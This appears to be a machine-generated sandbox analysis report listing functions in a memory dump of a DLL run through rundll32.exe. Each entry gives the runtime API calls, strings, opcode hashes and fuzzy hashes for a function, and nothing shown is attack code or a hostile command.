std::_Lockit::~_Lockit.LIBCPMT ref: 6D47BA74
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47BA92

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 06c5598a1ec4d2f6a88b411284251f4f0bd3ed5cea521f75f0154c9349ecb09e
Instruction ID: 138878d2f34deaac6d5ac750ce45965dff2197b52e02461f7c5820766d997cd0
Opcode Fuzzy Hash: 06c5598a1ec4d2f6a88b411284251f4f0bd3ed5cea521f75f0154c9349ecb09e
Instruction Fuzzy Hash: 0F119A36C082298BCF25DBA4C884EEE77B5AF85324F26040DD615AB290DF349E05CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D481072, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D481083
std::_Facet_Register.LIBCPMT ref: 6D4810D4
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4810F4
__CxxThrowException@8.LIBVCRUNTIME ref: 6D481112

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 26992ec900c6af6431f90c684b5185d235607b38d89f3e9a6f5f9d63bd7d840f
Instruction ID: 97326177e85ec5436a9785dfc038d60680295897353fa403b150e812f36207e0
Opcode Fuzzy Hash: 26992ec900c6af6431f90c684b5185d235607b38d89f3e9a6f5f9d63bd7d840f
Instruction Fuzzy Hash: 1B11A0329041698BCF15DB65C840EEE7775AF85358F26440EE611AB391DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480804, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480815
std::_Facet_Register.LIBCPMT ref: 6D480866
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480886
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4808A4

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: a6ac0704de2ffff93f32760c82f43bec27da4b41f57f307f280d5a49852a324c
Instruction ID: 501574e1bb70185e12b83917f32164f2108c4853dd2509aec750a55c50116b95
Opcode Fuzzy Hash: a6ac0704de2ffff93f32760c82f43bec27da4b41f57f307f280d5a49852a324c
Instruction Fuzzy Hash: 7311EC32C042298BCF19DFA1D844EEE7B75AF85394F26040DE610AB290DF30DE418BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4808AA, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D4808BB
std::_Facet_Register.LIBCPMT ref: 6D48090C
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48092C
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48094A

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: d3fcd1ffd85ac70160853d09c29c7d27365912011cb1fad83fe3c705da0cbaf0
Instruction ID: b549fafeacd3f6e5dae217e54e72226aeb4e8f047809c4f45a83c76aeb2e0ffc
Opcode Fuzzy Hash: d3fcd1ffd85ac70160853d09c29c7d27365912011cb1fad83fe3c705da0cbaf0
Instruction Fuzzy Hash: 5011AC3280412A8BCF15DFA6C840EEE77B5AF85364F26040DD610AB2A1DF74EE01DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47BA98, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D47BAA9
std::_Facet_Register.LIBCPMT ref: 6D47BAFA
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47BB1A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47BB38

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: ea560127e98e9fd7dc876ce4c52410c7a16ca128f0323e6ddd848438d01d4a91
Instruction ID: edf9d1510de5de9a4b89afd188f08ec27bcbe927fa6e0934a101447e8da26bcd
Opcode Fuzzy Hash: ea560127e98e9fd7dc876ce4c52410c7a16ca128f0323e6ddd848438d01d4a91
Instruction Fuzzy Hash: 88119A729042298BCF25DBA5C844EEE7775AF85328F26440DDA10AB390DF749E01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C45E6, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,6D4C458D,?,00000000,00000000,00000000,?,6D4C4924,00000006,6D507C58), ref: 6D4C4618
GetLastError.KERNEL32(?,6D4C458D,?,00000000,00000000,00000000,?,6D4C4924,00000006,6D507C58,6D507C50,6D507C58,00000000,00000364,?,6D4BDF29), ref: 6D4C4624
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6D4C458D,?,00000000,00000000,00000000,?,6D4C4924,00000006,6D507C58,6D507C50,6D507C58,00000000), ref: 6D4C4632

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 63f4d9ece53f847d87a470fe0be977a71b850d009b13cfe54b5dad9990190a53
Instruction ID: bd82ea86bdca110e910f3701ce1c0883a881a8a9b646d3c04cbb85fb896ebdc8
Opcode Fuzzy Hash: 63f4d9ece53f847d87a470fe0be977a71b850d009b13cfe54b5dad9990190a53
Instruction Fuzzy Hash: D501D43A755223ABCF114E7DCE44E567BA8AB0ABF17260225F919D3244DB24EC01CAE5

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B7C1D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6D4B7CAD

Strings

pow, xrefs: 6D4B7C85, 6D4B7CA2

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: d17adadd0a26647ba0e0a55b029b82124a75908f5c8a7dbc1a19f7938b4c5fd6
Instruction ID: 771380e0f8fc9e27472e3a77cf89ef2e8e80128af332eeb17585f8d318386dda
Opcode Fuzzy Hash: d17adadd0a26647ba0e0a55b029b82124a75908f5c8a7dbc1a19f7938b4c5fd6
Instruction Fuzzy Hash: 42514765E1C703A7CB02BB24C990F7A3BB4AB51741F31C95CE0A542398EB358C959E97

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CD324, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6D4CD5C5,?,00000050,?,?,?,?,?), ref: 6D4CD3FF

Strings

OCP, xrefs: 6D4CD378
ACP, xrefs: 6D4CD342

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: cf42f35e55068924c36078a873cb45939cbee6843f4b06b9dff94ce57f714b9e
Instruction ID: ee540e570f7a97e85225db797f073506710b60ffbbefc2c32ddc35384966cf5b
Opcode Fuzzy Hash: cf42f35e55068924c36078a873cb45939cbee6843f4b06b9dff94ce57f714b9e
Instruction Fuzzy Hash: B121C46A694106A6E714DE58CD00FDB73AAFBC5B50F678464EA09D7310F732ED01C356

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C22D0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4C2348

Strings

HTm, xrefs: 6D4C2315
DTm, xrefs: 6D4C2303

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free
String ID: DTm$HTm
API String ID: 269201875-2435632002
Opcode ID: 9c45274a6e8af62c446f1d1fcc86b5b3bff65d297180ef8683444ca852aa02eb
Instruction ID: af1f8f997447600e55b5ebc96017d885417481b4998f513798888fbb771f9472
Opcode Fuzzy Hash: 9c45274a6e8af62c446f1d1fcc86b5b3bff65d297180ef8683444ca852aa02eb
Instruction Fuzzy Hash: 2D11B4791083029FE770CF3DD480F5677E8EB167A8B30942EE5998B651DBB19C4187A2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C5F71, Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 6D4C6007
GetLastError.KERNEL32 ref: 6D4C6015
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 6D4C6070

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: d6dd633b63b2fe89919789d9cf623f97647acc3686a301fab28e76bd238b15a2
Instruction ID: 61d72aef1f7ea1925916033413172f8c401f68437eba1a38f4e8ca5d94da0ca8
Opcode Fuzzy Hash: d6dd633b63b2fe89919789d9cf623f97647acc3686a301fab28e76bd238b15a2
Instruction Fuzzy Hash: 0B41E739604216AFDB11CF6AC844F7A7BB5EF03314F21C25DE958672A1DB318D42C7A2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6532 Parent PID: 6444 rundll32.exeCOMMON

Executed Functions

Function 6D4BDEDB, Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6D4B41FE,6D4BF5DE,?,6D4BDE85,00000001,00000364,?,?,6D4B42CA,?,?,6D47A5FA), ref: 6D4BDEE0
_free.LIBCMT ref: 6D4BDF15
_free.LIBCMT ref: 6D4BDF3C
SetLastError.KERNEL32(00000000), ref: 6D4BDF49
SetLastError.KERNEL32(00000000), ref: 6D4BDF52

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 67ff05166153823f39a0d1fc125da1968a836a2430a76a5cf5e8fe01dbe0c9a9
Instruction ID: c231fee8f303f25c348a00c1e1bc0176ea73fec657a03491ce655016503f57b7
Opcode Fuzzy Hash: 67ff05166153823f39a0d1fc125da1968a836a2430a76a5cf5e8fe01dbe0c9a9
Instruction Fuzzy Hash: 6001493E10C60126DE0286394C84F1A2E79ABE63BAB33416DF60E93381FF31CC0181B5

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BF58C, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6D4BF5CD

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b3b739c4c03cc171a6a2512c26b0fd25f2567916fff8ce69eca33b8b3c58218e
Instruction ID: d7c3b021a5854b0cad3682e518e2aa0937773d0542cd68e65697bf0651ad2ccd
Opcode Fuzzy Hash: b3b739c4c03cc171a6a2512c26b0fd25f2567916fff8ce69eca33b8b3c58218e
Instruction Fuzzy Hash: 02F0243D65F126A7EB015E2A8C04F1A3798AF717B0B228016EC1CD6281DF31EC0186F0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4773C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 6D4773E8

Part of subcall function 6D478A3D: std::_Lockit::_Lockit.LIBCPMT ref: 6D478A4F
Part of subcall function 6D478A3D: std::locale::_Setgloballocale.LIBCPMT ref: 6D478A6A
Part of subcall function 6D478A3D: _Yarn.LIBCPMT ref: 6D478A80
Part of subcall function 6D478A3D: std::_Lockit::~_Lockit.LIBCPMT ref: 6D478AC0

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 238635018-0
Opcode ID: 3fb33257ae8c81fb0af646fa2067f6f1b85dd33568fd6f6f967d4cb5e3726680
Instruction ID: 0ea63edf627e76353725df574c67782d1d9c5ad45ce826082993449d712a0eb9
Opcode Fuzzy Hash: 3fb33257ae8c81fb0af646fa2067f6f1b85dd33568fd6f6f967d4cb5e3726680
Instruction Fuzzy Hash: A7E0DF32E0D622CBD3309B6A8001FACAB81AB40B94FA2001ED7009F680CBB44C4087D2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6D4CDE61, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 6D4BDE57: GetLastError.KERNEL32(?,?,6D4B42CA,?,?,6D47A5FA,?,6D460074,=R-,?,?,?,6D4FC880,000000FF), ref: 6D4BDE5B
Part of subcall function 6D4BDE57: _free.LIBCMT ref: 6D4BDE8E
Part of subcall function 6D4BDE57: SetLastError.KERNEL32(00000000), ref: 6D4BDECF
Part of subcall function 6D4BDE57: _abort.LIBCMT ref: 6D4BDED5

Part of subcall function 6D4BDE57: _free.LIBCMT ref: 6D4BDEB6
Part of subcall function 6D4BDE57: SetLastError.KERNEL32(00000000), ref: 6D4BDEC3

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6D4CDF6D
IsValidCodePage.KERNEL32(00000000), ref: 6D4CDFC8
IsValidLocale.KERNEL32(?,00000001), ref: 6D4CDFD7
GetLocaleInfoW.KERNEL32(?,00001001,.Km,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 6D4CE01F
GetLocaleInfoW.KERNEL32(?,00001002,00000004,00000040), ref: 6D4CE03E

Strings

=R-, xrefs: 6D4CDE69
.Km, xrefs: 6D4CDF43, 6D4CDF38, 6D4CDF96
.Km, xrefs: 6D4CDE77, 6D4CE016
.Km, xrefs: 6D4CDE8A, 6D4CDE9A, 6D4CDF5A, 6D4CDEFC, 6D4CDEF1, 6D4CDEF4, 6D4CDEFF, 6D4CDF5D

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: .Km$.Km$.Km$=R-
API String ID: 745075371-142106383
Opcode ID: 2352fd2f989ddcc43bf81c8af83a708986b6c52847f1c8a932762f57824107e6
Instruction ID: bbdfc5cfcde2771bc8d938c49f6fc1a364fff38656180e8b4437088aabd462c6
Opcode Fuzzy Hash: 2352fd2f989ddcc43bf81c8af83a708986b6c52847f1c8a932762f57824107e6
Instruction Fuzzy Hash: BB51717AA446069BEF10DFA5CC44FBE77B8BF95700F11456AE914E7240E7709D01CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CD50B, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 6D4BDE57: GetLastError.KERNEL32(?,?,6D4B42CA,?,?,6D47A5FA,?,6D460074,=R-,?,?,?,6D4FC880,000000FF), ref: 6D4BDE5B
Part of subcall function 6D4BDE57: _free.LIBCMT ref: 6D4BDE8E
Part of subcall function 6D4BDE57: SetLastError.KERNEL32(00000000), ref: 6D4BDECF
Part of subcall function 6D4BDE57: _abort.LIBCMT ref: 6D4BDED5

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6D4BE835,?,?,?,?,6D4BE211,?,00000004), ref: 6D4CD5ED
_wcschr.LIBVCRUNTIME ref: 6D4CD67D
_wcschr.LIBVCRUNTIME ref: 6D4CD68B
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,5Km,00000000,?), ref: 6D4CD72E

Strings

=R-, xrefs: 6D4CD6E5
5Km, xrefs: 6D4CD604, 6D4CD64C, 6D4CD6F4

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: 5Km$=R-
API String ID: 4212172061-438228943
Opcode ID: f4b1c12ea5de5b9c797a6f6f07d86e80b464ff9e3bce2fc9627f74cce88d0382
Instruction ID: c7b4aa6cc9255ef32e1e0c6e84fd27d3a38a885c2bb9104d8a2fbe77972dba8b
Opcode Fuzzy Hash: f4b1c12ea5de5b9c797a6f6f07d86e80b464ff9e3bce2fc9627f74cce88d0382
Instruction Fuzzy Hash: F5613B79644206AAEB14EF35CC40FBA73ACEF85754F21442DEA19D7280EB70ED41C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CDC8D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,6D4CDFAC,?,00000000), ref: 6D4CDD26
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,6D4CDFAC,?,00000000), ref: 6D4CDD4F
GetACP.KERNEL32(?,?,6D4CDFAC,?,00000000), ref: 6D4CDD64

Strings

OCP, xrefs: 6D4CDCE1
ACP, xrefs: 6D4CDCAB

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 7966e76a23ff36527de6f8bdb65bd4ed158541b150fc0c2765a6ece1c690cbab
Instruction ID: afcc78d726148c01da03b54a7522da485126a0f8b0fb36e3f9a78dbf1537bf20
Opcode Fuzzy Hash: 7966e76a23ff36527de6f8bdb65bd4ed158541b150fc0c2765a6ece1c690cbab
Instruction Fuzzy Hash: 3321B22AAC4142AAD7258F18C940F9773B6FFC5B20B628465E909D7304F732DD42C792

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B3EDA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6D4B3FD2
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6D4B3FDC
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6D4B3FE9

Strings

^Km, xrefs: 6D4B3EDC
=R-, xrefs: 6D4B3EE5

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: =R-$^Km
API String ID: 3906539128-1758129427
Opcode ID: d6c45b5ff5bd0ece1d13ee73b9a04f01701c726f8eeee6153470ca9b604dbfd0
Instruction ID: cd2e0200362100516e66bf70fd4938679b4b61cbe588f2580bda20d9f7015413
Opcode Fuzzy Hash: d6c45b5ff5bd0ece1d13ee73b9a04f01701c726f8eeee6153470ca9b604dbfd0
Instruction Fuzzy Hash: 3331D47590121DABCB21DF29D888B9DBBB8BF08354F5141DAE41DAB250EB709F818F94

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CBC30, Relevance: 19.6, APIs: 13, Instructions: 114COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6D4CBC74

Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF61
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF73
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF85
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF97
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFA9
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFBB
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFCD
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFDF
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFF1
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC003
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC015
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC027
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC039

_free.LIBCMT ref: 6D4CBC69

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(?,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?,?), ref: 6D4C02F6

_free.LIBCMT ref: 6D4CBC8B
_free.LIBCMT ref: 6D4CBCA0
_free.LIBCMT ref: 6D4CBCAB
_free.LIBCMT ref: 6D4CBCCD
_free.LIBCMT ref: 6D4CBCE0
_free.LIBCMT ref: 6D4CBCEE
_free.LIBCMT ref: 6D4CBCF9
_free.LIBCMT ref: 6D4CBD31
_free.LIBCMT ref: 6D4CBD38
_free.LIBCMT ref: 6D4CBD55
_free.LIBCMT ref: 6D4CBD6D

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: e30783bc724e0ab22ef163a5af8ac72329d5a4bc0ad61ec0d560dc0186cae01b
Instruction ID: 723a9988ff43810c956a1fc028de71134e3d95526f5fa90ba1f9796108423535
Opcode Fuzzy Hash: e30783bc724e0ab22ef163a5af8ac72329d5a4bc0ad61ec0d560dc0186cae01b
Instruction Fuzzy Hash: 6E314B796083069FEB209B75D944F6A77E9EF00325F31482DE959DB250EF35AC80CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C8870, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4C88F2
_free.LIBCMT ref: 6D4C8916
_free.LIBCMT ref: 6D4C8A9D
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6D508120), ref: 6D4C8AAF
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540A64,000000FF,00000000,0000003F,00000000,?,?), ref: 6D4C8B27
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540AB8,000000FF,?,0000003F,00000000,?), ref: 6D4C8B54
_free.LIBCMT ref: 6D4C8C69

Strings

=R-, xrefs: 6D4C8BAB

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: =R-
API String ID: 314583886-526339512
Opcode ID: f3a717610ddb93d3c3bbac6b876ce254568b29177abf97c867122c4c5d29ef98
Instruction ID: 919b703ca97fa5f29b14318156a3eb085a2b0109bd7dabcb1f97c2eb38637080
Opcode Fuzzy Hash: f3a717610ddb93d3c3bbac6b876ce254568b29177abf97c867122c4c5d29ef98
Instruction Fuzzy Hash: E6C128799082069FDB15DF79C840FAE7BB8AF42314F2541AEE59497341E7318E41CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BF177, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 274COMMON

Download Yara Rule

APIs

Part of subcall function 6D4BDE57: GetLastError.KERNEL32(?,?,6D4B42CA,?,?,6D47A5FA,?,6D460074,=R-,?,?,?,6D4FC880,000000FF), ref: 6D4BDE5B
Part of subcall function 6D4BDE57: _free.LIBCMT ref: 6D4BDE8E
Part of subcall function 6D4BDE57: SetLastError.KERNEL32(00000000), ref: 6D4BDECF
Part of subcall function 6D4BDE57: _abort.LIBCMT ref: 6D4BDED5

_memcmp.LIBVCRUNTIME ref: 6D4BF421
_free.LIBCMT ref: 6D4BF492
_free.LIBCMT ref: 6D4BF4AB
_free.LIBCMT ref: 6D4BF4DD
_free.LIBCMT ref: 6D4BF4E6
_free.LIBCMT ref: 6D4BF4F2

Strings

=R-, xrefs: 6D4BF182
C, xrefs: 6D4BF2DF

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: =R-$C
API String ID: 1679612858-2073421233
Opcode ID: a5f72012d3fde91f84c55e98aa093ecd46f9610939b675f89215fcb16d1dae68
Instruction ID: e5cc26451342284ca9e30399d7b24bc33520185a7663a7318929f6840039b9d8
Opcode Fuzzy Hash: a5f72012d3fde91f84c55e98aa093ecd46f9610939b675f89215fcb16d1dae68
Instruction Fuzzy Hash: BBC12B7990621A9FDB24CF18C884FADB7B4FB59304F6185AAD90DA7350D731AE90CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C240C, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,6D4C2B81,?,?,?,?,?,?), ref: 6D4C244E
__fassign.LIBCMT ref: 6D4C24C9
__fassign.LIBCMT ref: 6D4C24E4
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6D4C250A
WriteFile.KERNEL32(?,?,00000000,6D4C2B81,00000000,?,?,?,?,?,?,?,?,?,6D4C2B81,?), ref: 6D4C2529
WriteFile.KERNEL32(?,?,00000001,6D4C2B81,00000000,?,?,?,?,?,?,?,?,?,6D4C2B81,?), ref: 6D4C2562

Strings

=R-, xrefs: 6D4C2414

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID: =R-
API String ID: 1324828854-526339512
Opcode ID: c214aa73fece6ee32c3bf360dc021a9e6054e817e94aff7fcb7fafe77c047ad7
Instruction ID: 97f2cdaded1060c31db009cf59c5982260663a49d18d2682c6d76897284216c5
Opcode Fuzzy Hash: c214aa73fece6ee32c3bf360dc021a9e6054e817e94aff7fcb7fafe77c047ad7
Instruction Fuzzy Hash: EF519075A00249AFDF10CFA8C895FEEBBF8EF49300F15412AE955E7241DB709941CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C5B5F, Relevance: 13.8, APIs: 9, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5e1288afa835fd4c7d3b3875288687cdc784e4a45fdbcaed62dc58e751d143b
Instruction ID: fab856745e61aafe028194d5cca3168a18b08f21658e83dac7dbe6dc952cc962
Opcode Fuzzy Hash: f5e1288afa835fd4c7d3b3875288687cdc784e4a45fdbcaed62dc58e751d143b
Instruction Fuzzy Hash: 35C17F78D0838A9BDF01DFA9C844FBD7BB4AF1A314F254149E914A7381C7349D41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BFDE2, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000000,00000000,6D47312A,?,?,?,6D4C0033,00000001,00000001,9F418D08), ref: 6D4BFE3C
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6D4C0033,00000001,00000001,9F418D08,00000000,?,?), ref: 6D4BFEC2
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,00000000,9F418D08,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6D4BFFBC
__freea.LIBCMT ref: 6D4BFFC9

Part of subcall function 6D4C1817: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6D4C1849

__freea.LIBCMT ref: 6D4BFFD2
__freea.LIBCMT ref: 6D4BFFF7

Strings

=R-, xrefs: 6D4BFDE9

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID: =R-
API String ID: 1414292761-526339512
Opcode ID: 54114cdd00808bfa1e4ad4d19ebf83486203911e90a795f74954c7ed4388e79c
